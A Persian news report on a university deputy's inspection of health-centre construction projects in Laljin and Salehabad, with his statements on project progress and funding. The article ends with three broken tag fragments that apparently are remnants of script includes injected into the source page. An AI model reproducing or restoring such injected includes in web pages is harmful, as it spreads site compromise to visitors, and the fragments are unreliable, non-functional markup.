معاون توسعه مدیریت و منابع دانشگاه معاون توسعه مدیریت و منابع دانشگاه از پروژه های بهداشتی شهر لالجین و صالح آباد بازدید کرد.

مهندس بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه به اتفاق مهندس شیرین دخت مدیر حراست،  مهندس طاهری مدیر منابع فیزیکی، آقایانی مدیر امور پشتیبانی و رفاهی و دکتر به نشان مدیر شبکه بهداشت شهرستان بهار و دیگر مسئولین این حوزه از پروژه های بهداشتی شهر لالجین و صالح آباد بازدید کرد.

در این بازدید پیشرفت پروژه مرکز جامع سلامت شهر لالجین مورد بررسی و ارزیابی قرار گرفت. همچنین در ادامه از مرکز جامع سلامت شهر صالح آباد که به تازگی مورد بهره برداری قرار گرفته است بازدید و مشکلات این مرکز در ارائه خدمات بهداشتی و درمانی به مردم منطقه بررسی شد.

مهندس رحیمی ضمن اشاره به ساخت و تکمیل پروژه های بهداشتی استان بیان داشت: با توجه به شرایط اقتصادی ماههای اخیر،  ساخت پروژه های بهداشتی دانشگاه متوقف نشده است و  تاکنون ۱۰۰ پروژه بهداشتی و درمانی  بهره برداری شده و ۵۵ پروژه نیز در دست اقدام می باشد.

معاون توسعه دانشگاه در ادامه افزود ساخت مراکز جامع سلامت و خانه های بهداشت در نقاط محروم کشور از مهمترین دستاوردهای طرح تحول نظام سلامت است که باید با تمام توان آن را ادامه دهیم تا مردم شریف این مناطق بتوانند از خدمات ارزشمند آن بهره مند شوند.

بهروز رحیمی در پایان افزود: با توجه به پیشرفت خوب پروژه مرکز جامع سلامت شهر لالجین  و وجود اعتبارات لازم، امیدواریم این مرکز در دهه فجر سالجاری به بهره برداری برسد . همچنین با تلاش مسئولین مشکلات مرکز جامع سلامت شهر صالح آباد نیز به زودی مرتفع خواهد شد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>